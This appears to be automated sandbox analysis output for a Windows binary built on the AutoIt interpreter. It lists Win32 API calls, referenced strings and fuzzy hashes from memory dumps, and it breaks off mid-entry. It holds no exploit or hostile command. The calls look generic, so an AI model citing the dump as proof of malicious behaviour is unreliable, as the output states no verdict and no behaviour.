                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,00000000), ref: 00417135
                                                    • SafeArrayAllocData.OLEAUT32(00000000), ref: 0041718E
                                                    • VariantInit.OLEAUT32(?), ref: 004171A0
                                                    • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 004171C0
                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 00417213
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00417227
                                                    • VariantClear.OLEAUT32(?), ref: 0041723C
                                                    • SafeArrayDestroyData.OLEAUT32(00000000), ref: 00417249
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 00417252
                                                    • VariantClear.OLEAUT32(?), ref: 00417264
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 0041726F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: f6787e24e508cbba63f9f362e9282ebbf8a16ce6041986fcca8a8a049df4a363
                                                    • Instruction ID: 880644d1694037a8d87a6705a355513dae79aef9d3e843353f5a89213190eb36
                                                    • Opcode Fuzzy Hash: f6787e24e508cbba63f9f362e9282ebbf8a16ce6041986fcca8a8a049df4a363
                                                    • Instruction Fuzzy Hash: BB413A35900119AFCB00DFA4DC48DEEBBB8FF19354B11847AF555A7261CB34A98ACBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003C6C6C,?,00008000), ref: 003E0BB7
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6D0D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003C6E5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 1801377286-1018226102
                                                    • Opcode ID: 07631b53d2be8c253babf9aaccb887957e97bc131c13cb6ecd236cbe95a8ead6
                                                    • Instruction ID: dbd200036a3dfac093ca3f58b19ce5716b83fa5a1ce7eb1f69bb03cc6f75ba3f
                                                    • Opcode Fuzzy Hash: 07631b53d2be8c253babf9aaccb887957e97bc131c13cb6ecd236cbe95a8ead6
                                                    • Instruction Fuzzy Hash: 5A027B311083459FC726EF25C881EAFBBE4AF95354F10491EF5859B2A1DB30ED89CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32 ref: 00438718
                                                    • CoUninitialize.OLE32 ref: 00438723
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00452BEC,?), ref: 00438783
                                                    • IIDFromString.OLE32(?,?), ref: 004387F6
                                                    • VariantInit.OLEAUT32(?), ref: 00438890
                                                    • VariantClear.OLEAUT32(?), ref: 004388F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 636576611-1287834457
                                                    • Opcode ID: 2af341db6b5265d97b3828392d3117ea78c6c498cc0e1dfb1069147014994804
                                                    • Instruction ID: 51ed2a4a524656e2d5ead44915d7c95fa7ce03125ffa05136a3cd2c8e5cbcb6e
                                                    • Opcode Fuzzy Hash: 2af341db6b5265d97b3828392d3117ea78c6c498cc0e1dfb1069147014994804
                                                    • Instruction Fuzzy Hash: B961BE706083019FD715EF24C848B5BFBE8AF89714F10481EF9859B291CB78ED49CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,0042CD8C), ref: 004246E8
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?,?,?,?,?,0042CD8C), ref: 0042470E
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?,?,?,?,?,0042CD8C), ref: 00424784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: FileInfoVersion$QuerySizeValue
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 2179348866-1459072770
                                                    • Opcode ID: 015749b6505f796c100aec717197e46f3b8fd8db5c40425466eb4ee7c423ce45
                                                    • Instruction ID: 0f3f445ca78eeb9be076bc66e43c0089ead06f5e1dd09b2bafd85e3feb8bfa1c
                                                    • Opcode Fuzzy Hash: 015749b6505f796c100aec717197e46f3b8fd8db5c40425466eb4ee7c423ce45
                                                    • Instruction Fuzzy Hash: 194149766041A47AE702B771AC47EBF776CDF81710F100267F505BA1C2EB39AA0196BD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 0042DF47
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042DF57
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0042DF63
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042E000
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E014
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E046
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E067
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0042E0B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                    • String ID: *.*
                                                    • API String ID: 1464919966-438819550
                                                    • Opcode ID: 75fbda7633da35370f2683487238c5a6c30111f25ab36646ade24028440a649e
                                                    • Instruction ID: 898f6dd12355a8c92e5c1109672e9246cda5870ae7563599a115303cd694de5b
                                                    • Opcode Fuzzy Hash: 75fbda7633da35370f2683487238c5a6c30111f25ab36646ade24028440a649e
                                                    • Instruction Fuzzy Hash: B86178766042259FCB10EF21D844AAFB3E8FF89310F45892EF989CB251DB35E905CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,0044F910), ref: 0042AB76
                                                    • GetDriveTypeW.KERNEL32(00000061,0047A620,00000061), ref: 0042AC40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
Similarity
• API ID: BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2426244813-1000479233

APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00435AA6
• inet_addr.WSOCK32(?,?,?), ref: 00435AEB
• gethostbyname.WSOCK32(?), ref: 00435AF7
• IcmpCreateFile.IPHLPAPI ref: 00435B05
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00435B75
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00435B8B
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00435C00
• WSACleanup.WSOCK32 ref: 00435C06
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115

APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0042A0FC
• LoadStringW.USER32(?,?,00000FFF,?), ref: 0042A11E
Similarity
• API ID: LoadString
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%E
• API String ID: 2948472770-1668631458

APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00429EEA
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00429F0B
Similarity
• API ID: LoadString
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 2948472770-3080491070

APIs
• SetErrorMode.KERNEL32(00000001), ref: 0042B73B
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042B7B1
• GetLastError.KERNEL32 ref: 0042B7BB
• SetErrorMode.KERNEL32(00000000,READY), ref: 0042B828
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454

APIs
  • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004194F6
• GetDlgCtrlID.USER32 ref: 00419501
• GetParent.USER32 ref: 0041951D
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00419520
• GetDlgCtrlID.USER32(?), ref: 00419529
• GetParent.USER32(?), ref: 00419545
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00419548
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172

APIs
  • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004195DF
• GetDlgCtrlID.USER32(?), ref: 004195EA
• GetParent.USER32(?), ref: 00419606
• SendMessageW.USER32(00000000,?,ListBox,?), ref: 00419609
• GetDlgCtrlID.USER32(?), ref: 00419612
• GetParent.USER32(?), ref: 0041962E
• SendMessageW.USER32(00000000,?,?,ListBox), ref: 00419631
Similarity
• API ID: MessageSend$CtrlParent$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2573188126-1403004172

APIs
• GetMenuItemInfoW.USER32(00486890,000000FF,00000000,00000030), ref: 00422A92
• SetMenuItemInfoW.USER32 ref: 00422AC8
• Sleep.KERNEL32(000001F4), ref: 00422ADA
• GetMenuItemCount.USER32 ref: 00422B1E
• GetMenuItemID.USER32(?,00000000), ref: 00422B3A
• GetMenuItemID.USER32(?,-00000001), ref: 00422B64
• GetMenuItemID.USER32(?,?), ref: 00422BA9
• CheckMenuRadioItem.USER32 ref: 00422BEF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00422C03
• SetMenuItemInfoW.USER32 ref: 00422C24
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID:
• API String ID: 1460738036-0

APIs
• SendMessageW.USER32(?,0000101F,?,?), ref: 00447214
• SendMessageW.USER32(00000000,?,0000101F,?), ref: 00447217
• GetWindowLongW.USER32(?,000000F0), ref: 0044723B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0044725E
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004472D6
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0

APIs
• GetCurrentThreadId.KERNEL32 ref: 00421700
• GetForegroundWindow.USER32(00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 00421714
• GetWindowThreadProcessId.USER32(00000000), ref: 0042171B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 0042172A
• GetWindowThreadProcessId.USER32(00000002,00000000), ref: 0042173C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 00421755
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00420778,?,00000001,?,?), ref: 00421767
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217AC
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217C1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00420778,?,00000001,?,?), ref: 004217CC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0

APIs
• GetSysColor.USER32(00000008), ref: 003C2231
• SetTextColor.GDI32(?,000000FF), ref: 003C223B
• SetBkMode.GDI32(?,00000001), ref: 003C2250
• GetStockObject.GDI32(00000005), ref: 003C2258
• GetClientRect.USER32 ref: 003FC00B
• SendMessageW.USER32(?,00001328,00000000,?), ref: 003FC022
• GetWindowDC.USER32(?), ref: 003FC02E
• GetPixel.GDI32(00000000,?,?), ref: 003FC03D
• ReleaseDC.USER32 ref: 003FC04F
• GetSysColor.USER32(00000005), ref: 003FC06D
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0

APIs
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042DCBA
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DCCE
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0042DCE6
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0042DD00
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DD12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile
                                                    • String ID: *.*
                                                    • API String ID: 769691225-438819550
                                                    • Opcode ID: 316f708a2f09b33b67158b70da7fdfbfb3e8911986a955f3c713d434e8ee996f
                                                    • Instruction ID: effe7d7834268457010006fce9a229aaf1b755f444d64596a09a1ad8ee85ef69
                                                    • Opcode Fuzzy Hash: 316f708a2f09b33b67158b70da7fdfbfb3e8911986a955f3c713d434e8ee996f
                                                    • Instruction Fuzzy Hash: 1381B471A042509FCB24DF24D8559ABB7E8BB88310F95882FF889CB350E778ED45CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32 ref: 003C2EAE
                                                    • GetDC.USER32 ref: 003FCF82
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FCF95
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003FCFA3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003FCFB8
                                                    • ReleaseDC.USER32 ref: 003FCFC0
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003FD04B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ObjectSelectWindow$LongMessageMoveReleaseSend
                                                    • String ID: U
                                                    • API String ID: 1056245551-3372436214
                                                    • Opcode ID: 3bb5c32cd6fb2dc5f924f32ca683c0d9fab024af816fffe0a1f517e26bf38675
                                                    • Instruction ID: a64f8c6b129a115e848d5557e56cdcdf0a8f813387be98efe50343010e7cbc3d
                                                    • Opcode Fuzzy Hash: 3bb5c32cd6fb2dc5f924f32ca683c0d9fab024af816fffe0a1f517e26bf38675
                                                    • Instruction Fuzzy Hash: A971A231400209EFCF229F64C984EFA7BBAFF49354F15426AFA55AA166C7319C41DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,004843BA,00000104,?,00000001,00000000), ref: 003EA49A
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 003EA554
                                                    • _strlen.LIBCMT ref: 003EA594
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,?,?,00000001,00000000), ref: 003EA5A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: File$HandleModuleNameWrite_strlen
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 2384599179-4022980321
                                                    • Opcode ID: dfda354b8672cee083a54fdc8afc5b122638169036b185a38dddd5bdb5c0500e
                                                    • Instruction ID: 864905d4ace1a0a0173b94da99cba76a6cae059a2f40e2abec29510ee60198cc
                                                    • Opcode Fuzzy Hash: dfda354b8672cee083a54fdc8afc5b122638169036b185a38dddd5bdb5c0500e
                                                    • Instruction Fuzzy Hash: CE417A32B40BBAB6D713366A9C06FFF375CAB52715F11033AFE45A50C1EA616A0442A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003FE6C9,00000010,?,Bad directive syntax error,0044F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0041FCD2
                                                    • LoadStringW.USER32(00000000,?,003FE6C9,00000010), ref: 0041FCD9
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0041FD9D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 2734547477-4153970271
                                                    • Opcode ID: 9fde7321ac215e2a8071c0bddb3b864c7d13eda59fbed6c4675b3e6de049b8c8
                                                    • Instruction ID: c43fcede311f1e9a9741da49c50bea447c2882fb4648c7fcbe8ef63725a63b16
                                                    • Opcode Fuzzy Hash: 9fde7321ac215e2a8071c0bddb3b864c7d13eda59fbed6c4675b3e6de049b8c8
                                                    • Instruction Fuzzy Hash: 1B21513290421AEBDF13EBA0DC4AFFE7739FF14300F04446AF509660A1DA36AA59DB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetParent.USER32(?), ref: 00419651
                                                    • GetClassNameW.USER32 ref: 00419666
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004196F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1290815626-3381328864
                                                    • Opcode ID: 3f93c9f1be0e05119ecbf03781cc0ef7bf29a950f5b5e3329fc16c52cc9ec83e
                                                    • Instruction ID: 64ce08483f85e077b52c5f5119e9ddb8a4a24809dcb03247f88140e7cad1fff5
                                                    • Opcode Fuzzy Hash: 3f93c9f1be0e05119ecbf03781cc0ef7bf29a950f5b5e3329fc16c52cc9ec83e
                                                    • Instruction Fuzzy Hash: 05110A77244367BAFA022621EC2BDE7779CDB11370B300127F504A50D1FE6A6D91866D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044F910), ref: 0043903D
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044F910), ref: 00439071
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004391EB
                                                    • SysFreeString.OLEAUT32(?), ref: 00439215
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: 1afc697ae5d917333e8ab0afe7dba3bb98b85727d433fef2fca7c0ec1ad4055f
                                                    • Instruction ID: a6eb0621bc5fb2c36f7a327142a2b2c45ac81881bc858121f8b4fca47b09ef8b
                                                    • Opcode Fuzzy Hash: 1afc697ae5d917333e8ab0afe7dba3bb98b85727d433fef2fca7c0ec1ad4055f
                                                    • Instruction Fuzzy Hash: 61F15F75A00209EFDF04DF94C888EAEB7B9FF49314F10809AF915AB250CB75AE46CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044896E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 3668373e3f6da86c9678b5ee0b75fb11cbbcf80346cb6de13d6847eef6406a4f
                                                    • Instruction ID: ec7cb9e6d78a5b390c0ccf4cac018509c0559e5c193d36c1fe0518f14128ef4a
                                                    • Opcode Fuzzy Hash: 3668373e3f6da86c9678b5ee0b75fb11cbbcf80346cb6de13d6847eef6406a4f
                                                    • Instruction Fuzzy Hash: 2A518330600208BFFF21AF24CC85BAE7BA5FB05354F50452FF515E66A1CFB9A9809B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadImageW.USER32 ref: 003FC547
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FC569
                                                    • LoadImageW.USER32 ref: 003FC581
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FC59F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FC5C0
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,003D259D,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FC5CF
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FC5EC
                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,003D259D,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FC5FB
                                                      • Part of subcall function 0044A71E: DeleteObject.GDI32(00000000), ref: 0044A757
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: ad07a34c504c0df14d56d5c27b86c5226a5227db3816ab0aecba78b41631bfd4
                                                    • Instruction ID: 910bb3ab306d927128b7ec0dddc4a40f03eaf3f4e26ba8cf7cc14013c1ddcd78
                                                    • Opcode Fuzzy Hash: ad07a34c504c0df14d56d5c27b86c5226a5227db3816ab0aecba78b41631bfd4
                                                    • Instruction Fuzzy Hash: 37518474A50208AFDB25DF25DC45FAB3BB8EB59360F11452DF906E76A0CB70AD80DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
